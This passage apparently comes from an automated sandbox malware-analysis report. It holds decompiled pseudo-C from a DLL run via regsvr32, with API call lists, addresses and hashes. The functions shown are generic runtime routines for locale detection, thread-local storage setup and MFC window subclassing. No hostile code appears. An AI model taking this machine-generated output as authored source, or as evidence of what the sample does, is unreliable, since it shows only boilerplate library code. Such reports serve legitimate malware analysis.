                                                                                                        							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                        								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                        								_t184 = _t184 + 0xc;
                                                                                                        								if(_t113 == 1) {
                                                                                                        									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t146 = _t115 & 0x3ff;
                                                                                                        									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                        									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                        									 *(_t181 - 0x10) = 2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							RegCloseKey( *(_t181 - 0x18));
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t123 =  *_t79() & 0x0000ffff;
                                                                                                        					 *(_t181 - 0x14) = _t123;
                                                                                                        					_t124 = _t123 & 0x0000ffff;
                                                                                                        					_t164 = _t124 & 0x3ff;
                                                                                                        					 *(_t181 - 0x1c) = _t164;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                        					 *(_t181 - 0x10) = 2;
                                                                                                        					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                        					if(_t131 != 0) {
                                                                                                        						_t133 =  *_t131() & 0x0000ffff;
                                                                                                        						 *(_t181 - 0x14) = _t133;
                                                                                                        						_t134 = _t133 & 0x0000ffff;
                                                                                                        						_t172 = _t134 & 0x3ff;
                                                                                                        						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                        						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                        						 *(_t181 - 0x10) = 4;
                                                                                                        					}
                                                                                                        					_t169 = 0;
                                                                                                        				}
                                                                                                        				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                        				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                        				_t181[0x105] = 0;
                                                                                                        				_t181[0x104] = 0;
                                                                                                        				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                        					_t143 = 0x20;
                                                                                                        					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                        					 *(_t181 - 0x5c) = _t181;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                        					 *(_t181 - 0x48) = 0x10000000;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                        					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                        					 *(_t181 - 4) = _t169;
                                                                                                        					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                        						E1000A2DF(_t181 - 0x3c);
                                                                                                        					}
                                                                                                        					_t176 = 0;
                                                                                                        					if( *(_t181 - 0x10) <= _t169) {
                                                                                                        						L23:
                                                                                                        						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                        						E1000A8D0(_t181 - 0x3c);
                                                                                                        						_t92 = _t169;
                                                                                                        						goto L24;
                                                                                                        					} else {
                                                                                                        						while(1) {
                                                                                                        							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                        							if(_t94 != _t169) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t176 =  &(1[_t176]);
                                                                                                        							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							goto L23;
                                                                                                        						}
                                                                                                        						_t169 = _t94;
                                                                                                        						goto L23;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t92 = 0;
                                                                                                        					L24:
                                                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                        					_pop(_t170);
                                                                                                        					_pop(_t177);
                                                                                                        					_pop(_t144);
                                                                                                        					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                        				}
                                                                                                        			}
































                                                                                                        0x1000aa3a
                                                                                                        0x1000aa3b
                                                                                                        0x1000aa41
                                                                                                        0x1000aa45
                                                                                                        0x1000aa4c
                                                                                                        0x1000aa52
                                                                                                        0x1000aa59
                                                                                                        0x1000aa6a
                                                                                                        0x1000aa71
                                                                                                        0x1000aa74
                                                                                                        0x1000aa77
                                                                                                        0x1000aa7a
                                                                                                        0x1000aa88
                                                                                                        0x1000aa8b
                                                                                                        0x1000aa8f
                                                                                                        0x1000ab5d
                                                                                                        0x1000ac19
                                                                                                        0x1000ac1d
                                                                                                        0x1000ac31
                                                                                                        0x1000ac34
                                                                                                        0x1000ac3e
                                                                                                        0x1000ac44
                                                                                                        0x1000ac5c
                                                                                                        0x1000ac68
                                                                                                        0x1000ac6d
                                                                                                        0x1000ac70
                                                                                                        0x1000ac70
                                                                                                        0x1000ac3e
                                                                                                        0x1000ab63
                                                                                                        0x1000ab77
                                                                                                        0x1000ab82
                                                                                                        0x1000ab98
                                                                                                        0x1000aba7
                                                                                                        0x1000abbf
                                                                                                        0x1000abc4
                                                                                                        0x1000abca
                                                                                                        0x1000abd6
                                                                                                        0x1000abd9
                                                                                                        0x1000abeb
                                                                                                        0x1000abf7
                                                                                                        0x1000abfc
                                                                                                        0x1000abff
                                                                                                        0x1000abff
                                                                                                        0x1000abca
                                                                                                        0x1000ac09
                                                                                                        0x1000ac09
                                                                                                        0x1000ab82
                                                                                                        0x1000aa95
                                                                                                        0x1000aa9d
                                                                                                        0x1000aaa0
                                                                                                        0x1000aaa3
                                                                                                        0x1000aab5
                                                                                                        0x1000aabe
                                                                                                        0x1000aac6
                                                                                                        0x1000aad3
                                                                                                        0x1000aad6
                                                                                                        0x1000aadd
                                                                                                        0x1000aae1
                                                                                                        0x1000aae5
                                                                                                        0x1000aae8
                                                                                                        0x1000aaeb
                                                                                                        0x1000aaf8
                                                                                                        0x1000ab04
                                                                                                        0x1000ab09
                                                                                                        0x1000ab0c
                                                                                                        0x1000ab0c
                                                                                                        0x1000ab13
                                                                                                        0x1000ab13
                                                                                                        0x1000ab18
                                                                                                        0x1000ab1b
                                                                                                        0x1000ab32
                                                                                                        0x1000ab39
                                                                                                        0x1000ab48
                                                                                                        0x1000ac7e
                                                                                                        0x1000ac85
                                                                                                        0x1000ac95
                                                                                                        0x1000ac98
                                                                                                        0x1000ac9b
                                                                                                        0x1000aca2
                                                                                                        0x1000aca5
                                                                                                        0x1000acac
                                                                                                        0x1000acb8
                                                                                                        0x1000acc2
                                                                                                        0x1000acc7
                                                                                                        0x1000acc7
                                                                                                        0x1000accc
                                                                                                        0x1000acd1
                                                                                                        0x1000acee
                                                                                                        0x1000acee
                                                                                                        0x1000acf5
                                                                                                        0x1000acfa
                                                                                                        0x00000000
                                                                                                        0x1000acd3
                                                                                                        0x1000acd3
                                                                                                        0x1000acda
                                                                                                        0x1000ace2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ace4
                                                                                                        0x1000ace8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000acea
                                                                                                        0x1000acec
                                                                                                        0x00000000
                                                                                                        0x1000acec
                                                                                                        0x1000ab4e
                                                                                                        0x1000ab4e
                                                                                                        0x1000acfc
                                                                                                        0x1000acff
                                                                                                        0x1000ad07
                                                                                                        0x1000ad08
                                                                                                        0x1000ad09
                                                                                                        0x1000ad1e
                                                                                                        0x1000ad1e

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                        • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                        • GetVersion.KERNEL32 ref: 1000AB55
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
                                                                                                        • _sscanf.LIBCMT ref: 1000ABBF
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
                                                                                                        • ConvertDefaultLocale.KERNEL32(74E04EE0), ref: 1000ABFA
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1000AC09
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
                                                                                                        • EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
                                                                                                        • ConvertDefaultLocale.KERNEL32(74E04EE0), ref: 1000AC6B
                                                                                                        • _memset.LIBCMT ref: 1000AC85
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 434808117-483790700
                                                                                                        • Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                        • Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
                                                                                                        • Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                        • Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1001C11B(void* __ebx) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				long _t10;
                                                                                                        				void* _t11;
                                                                                                        				int _t12;
                                                                                                        				void* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				long _t26;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t30 = __ebx;
                                                                                                        				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                        				if(_t37 != 0) {
                                                                                                        					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                        					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
                                                                                                        					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
                                                                                                        					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                        					__eflags =  *0x1005aea4;
                                                                                                        					_t40 = TlsSetValue;
                                                                                                        					 *0x1005aeb0 = _t7;
                                                                                                        					if( *0x1005aea4 == 0) {
                                                                                                        						L6:
                                                                                                        						 *0x1005aea8 = TlsGetValue;
                                                                                                        						 *0x1005aea4 = E1001BDD2;
                                                                                                        						 *0x1005aeac = _t40;
                                                                                                        						 *0x1005aeb0 = TlsFree;
                                                                                                        					} else {
                                                                                                        						__eflags =  *0x1005aea8;
                                                                                                        						if( *0x1005aea8 == 0) {
                                                                                                        							goto L6;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x1005aeac;
                                                                                                        							if( *0x1005aeac == 0) {
                                                                                                        								goto L6;
                                                                                                        							} else {
                                                                                                        								__eflags = _t7;
                                                                                                        								if(_t7 == 0) {
                                                                                                        									goto L6;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t10 = TlsAlloc();
                                                                                                        					__eflags = _t10 - 0xffffffff;
                                                                                                        					 *0x10057d30 = _t10;
                                                                                                        					if(_t10 == 0xffffffff) {
                                                                                                        						L15:
                                                                                                        						_t11 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = TlsSetValue(_t10,  *0x1005aea8);
                                                                                                        						__eflags = _t12;
                                                                                                        						if(_t12 == 0) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							E10018042();
                                                                                                        							 *0x1005aea4 = E1001BD03( *0x1005aea4);
                                                                                                        							 *0x1005aea8 = E1001BD03( *0x1005aea8);
                                                                                                        							 *0x1005aeac = E1001BD03( *0x1005aeac);
                                                                                                        							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
                                                                                                        							_t18 = E1001A3D3();
                                                                                                        							__eflags = _t18;
                                                                                                        							if(_t18 == 0) {
                                                                                                        								L14:
                                                                                                        								E1001BE05();
                                                                                                        								goto L15;
                                                                                                        							} else {
                                                                                                        								_push(E1001BF91);
                                                                                                        								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
                                                                                                        								__eflags = _t21 - 0xffffffff;
                                                                                                        								 *0x10057d2c = _t21;
                                                                                                        								if(_t21 == 0xffffffff) {
                                                                                                        									goto L14;
                                                                                                        								} else {
                                                                                                        									_t42 = E1001E76E(1, 0x214);
                                                                                                        									__eflags = _t42;
                                                                                                        									if(_t42 == 0) {
                                                                                                        										goto L14;
                                                                                                        									} else {
                                                                                                        										_push(_t42);
                                                                                                        										_push( *0x10057d2c);
                                                                                                        										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
                                                                                                        										if(__eflags == 0) {
                                                                                                        											goto L14;
                                                                                                        										} else {
                                                                                                        											_push(0);
                                                                                                        											_push(_t42);
                                                                                                        											E1001BE42(_t30, _t37, _t42, __eflags);
                                                                                                        											_t26 = GetCurrentThreadId();
                                                                                                        											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                        											 *_t42 = _t26;
                                                                                                        											_t11 = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return _t11;
                                                                                                        				} else {
                                                                                                        					E1001BE05();
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}
















                                                                                                        0x1001c11b
                                                                                                        0x1001c127
                                                                                                        0x1001c12b
                                                                                                        0x1001c14b
                                                                                                        0x1001c158
                                                                                                        0x1001c165
                                                                                                        0x1001c16a
                                                                                                        0x1001c16c
                                                                                                        0x1001c173
                                                                                                        0x1001c179
                                                                                                        0x1001c17e
                                                                                                        0x1001c196
                                                                                                        0x1001c19b
                                                                                                        0x1001c1a5
                                                                                                        0x1001c1af
                                                                                                        0x1001c1b5
                                                                                                        0x1001c180
                                                                                                        0x1001c180
                                                                                                        0x1001c187
                                                                                                        0x00000000
                                                                                                        0x1001c189
                                                                                                        0x1001c189
                                                                                                        0x1001c190
                                                                                                        0x00000000
                                                                                                        0x1001c192
                                                                                                        0x1001c192
                                                                                                        0x1001c194
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001c194
                                                                                                        0x1001c190
                                                                                                        0x1001c187
                                                                                                        0x1001c1ba
                                                                                                        0x1001c1c0
                                                                                                        0x1001c1c3
                                                                                                        0x1001c1c8
                                                                                                        0x1001c29a
                                                                                                        0x1001c29a
                                                                                                        0x1001c29a
                                                                                                        0x1001c1ce
                                                                                                        0x1001c1d5
                                                                                                        0x1001c1d7
                                                                                                        0x1001c1d9
                                                                                                        0x00000000
                                                                                                        0x1001c1df
                                                                                                        0x1001c1df
                                                                                                        0x1001c1f5
                                                                                                        0x1001c205
                                                                                                        0x1001c215
                                                                                                        0x1001c222
                                                                                                        0x1001c227
                                                                                                        0x1001c22c
                                                                                                        0x1001c22e
                                                                                                        0x1001c295
                                                                                                        0x1001c295
                                                                                                        0x00000000
                                                                                                        0x1001c230
                                                                                                        0x1001c230
                                                                                                        0x1001c241
                                                                                                        0x1001c243
                                                                                                        0x1001c246
                                                                                                        0x1001c24b
                                                                                                        0x00000000
                                                                                                        0x1001c24d
                                                                                                        0x1001c259
                                                                                                        0x1001c25b
                                                                                                        0x1001c25f
                                                                                                        0x00000000
                                                                                                        0x1001c261
                                                                                                        0x1001c261
                                                                                                        0x1001c262
                                                                                                        0x1001c276
                                                                                                        0x1001c278
                                                                                                        0x00000000
                                                                                                        0x1001c27a
                                                                                                        0x1001c27a
                                                                                                        0x1001c27c
                                                                                                        0x1001c27d
                                                                                                        0x1001c284
                                                                                                        0x1001c28a
                                                                                                        0x1001c28e
                                                                                                        0x1001c292
                                                                                                        0x1001c292
                                                                                                        0x1001c278
                                                                                                        0x1001c25f
                                                                                                        0x1001c24b
                                                                                                        0x1001c22e
                                                                                                        0x1001c1d9
                                                                                                        0x1001c29e
                                                                                                        0x1001c12d
                                                                                                        0x1001c12d
                                                                                                        0x1001c135
                                                                                                        0x1001c135

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
                                                                                                        • __mtterm.LIBCMT ref: 1001C12D
                                                                                                          • Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
                                                                                                          • Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001E,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
                                                                                                        • TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
                                                                                                        • __init_pointers.LIBCMT ref: 1001C1DF
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C1EA
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C1FA
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C20A
                                                                                                        • __encode_pointer.LIBCMT ref: 1001C21A
                                                                                                        • __decode_pointer.LIBCMT ref: 1001C23B
                                                                                                        • __calloc_crt.LIBCMT ref: 1001C254
                                                                                                        • __decode_pointer.LIBCMT ref: 1001C26E
                                                                                                        • __initptd.LIBCMT ref: 1001C27D
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1001C284
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 2657569430-3819984048
                                                                                                        • Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                        • Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
                                                                                                        • Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                        • Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr _t54;
                                                                                                        				void* _t55;
                                                                                                        				signed int _t56;
                                                                                                        				void* _t59;
                                                                                                        				long _t60;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t66;
                                                                                                        				short _t72;
                                                                                                        				signed int _t74;
                                                                                                        				signed int _t76;
                                                                                                        				long _t83;
                                                                                                        				signed int _t86;
                                                                                                        				signed short _t87;
                                                                                                        				signed int _t88;
                                                                                                        				int _t94;
                                                                                                        				void* _t106;
                                                                                                        				long* _t108;
                                                                                                        				long _t110;
                                                                                                        				signed int _t111;
                                                                                                        				CHAR* _t112;
                                                                                                        				intOrPtr _t113;
                                                                                                        				void* _t116;
                                                                                                        				void* _t119;
                                                                                                        				intOrPtr _t120;
                                                                                                        
                                                                                                        				_t119 = __eflags;
                                                                                                        				_t105 = __edi;
                                                                                                        				_push(0x148);
                                                                                                        				E10017C2A(E1002866E, __ebx, __edi, __esi);
                                                                                                        				_t110 =  *(_t116 + 0x10);
                                                                                                        				_t94 =  *(_t116 + 0xc);
                                                                                                        				_push(0x1000a0f5);
                                                                                                        				 *(_t116 - 0x120) = _t110;
                                                                                                        				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
                                                                                                        				_t120 = _t54;
                                                                                                        				_t97 = 0 | _t120 == 0x00000000;
                                                                                                        				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                        				_t121 = _t120 == 0;
                                                                                                        				if(_t120 == 0) {
                                                                                                        					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
                                                                                                        				}
                                                                                                        				if( *(_t116 + 8) == 3) {
                                                                                                        					_t106 =  *_t110;
                                                                                                        					_t111 =  *(_t54 + 0x14);
                                                                                                        					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
                                                                                                        					__eflags = _t111;
                                                                                                        					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                        					 *(_t116 - 0x124) = _t56;
                                                                                                        					if(_t111 != 0) {
                                                                                                        						L7:
                                                                                                        						__eflags =  *0x1005acbc;
                                                                                                        						if( *0x1005acbc == 0) {
                                                                                                        							L12:
                                                                                                        							__eflags = _t111;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								__eflags =  *0x1005a8dc;
                                                                                                        								if( *0x1005a8dc != 0) {
                                                                                                        									L19:
                                                                                                        									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
                                                                                                        									if(__eflags != 0) {
                                                                                                        										L23:
                                                                                                        										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                        										__eflags = _t59;
                                                                                                        										 *(_t116 - 0x14) = _t59;
                                                                                                        										if(_t59 != 0) {
                                                                                                        											_t112 = "AfxOldWndProc423";
                                                                                                        											_t64 = GetPropA(_t94, _t112);
                                                                                                        											__eflags = _t64;
                                                                                                        											if(_t64 == 0) {
                                                                                                        												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                        												_t66 = GetPropA(_t94, _t112);
                                                                                                        												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                        												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                        													GlobalAddAtomA(_t112);
                                                                                                        													SetWindowLongA(_t94, 0xfffffffc, E10011245);
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        										L27:
                                                                                                        										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                        										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                        										__eflags =  *(_t116 - 0x124);
                                                                                                        										_t110 = _t60;
                                                                                                        										if( *(_t116 - 0x124) != 0) {
                                                                                                        											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                        											_t50 = _t105 + 0x28;
                                                                                                        											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                        											__eflags =  *_t50;
                                                                                                        										}
                                                                                                        										goto L30;
                                                                                                        									}
                                                                                                        									goto L27;
                                                                                                        								}
                                                                                                        								_t113 = 0x30;
                                                                                                        								E100174D0(_t106, _t116 - 0x154, 0, _t113);
                                                                                                        								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                        								_push(_t116 - 0x154);
                                                                                                        								_push("#32768");
                                                                                                        								_push(0);
                                                                                                        								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                        								__eflags = _t72;
                                                                                                        								 *0x1005a8dc = _t72;
                                                                                                        								if(_t72 == 0) {
                                                                                                        									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                        									__eflags = _t74;
                                                                                                        									if(_t74 == 0) {
                                                                                                        										goto L23;
                                                                                                        									}
                                                                                                        									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                        									_t76 = E100199C1(_t116 - 0x118, "#32768");
                                                                                                        									__eflags = _t76;
                                                                                                        									if(_t76 == 0) {
                                                                                                        										goto L27;
                                                                                                        									}
                                                                                                        									goto L23;
                                                                                                        								}
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                        							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                        							E1000FB9D(_t111, _t116, _t94);
                                                                                                        							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                        							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                        							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
                                                                                                        							__eflags = _t83 - E1001025C;
                                                                                                        							if(_t83 != E1001025C) {
                                                                                                        								 *_t108 = _t83;
                                                                                                        							}
                                                                                                        							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                        							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                        							__eflags =  *(_t116 - 0x14);
                                                                                                        							if( *(_t116 - 0x14) != 0) {
                                                                                                        								_push( *(_t116 - 0x18));
                                                                                                        								_push(0);
                                                                                                        								E1000CEFC();
                                                                                                        							}
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                        						__eflags = _t86 & 0x00010000;
                                                                                                        						if((_t86 & 0x00010000) != 0) {
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						_t87 =  *(_t106 + 0x28);
                                                                                                        						__eflags = _t87 - 0xffff;
                                                                                                        						if(_t87 <= 0xffff) {
                                                                                                        							 *(_t116 - 0x18) = 0;
                                                                                                        							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                        							_t87 = _t116 - 0x18;
                                                                                                        						}
                                                                                                        						_t88 = E1000A7E1(_t87, "ime");
                                                                                                        						__eflags = _t88;
                                                                                                        						_pop(_t97);
                                                                                                        						if(_t88 == 0) {
                                                                                                        							goto L27;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
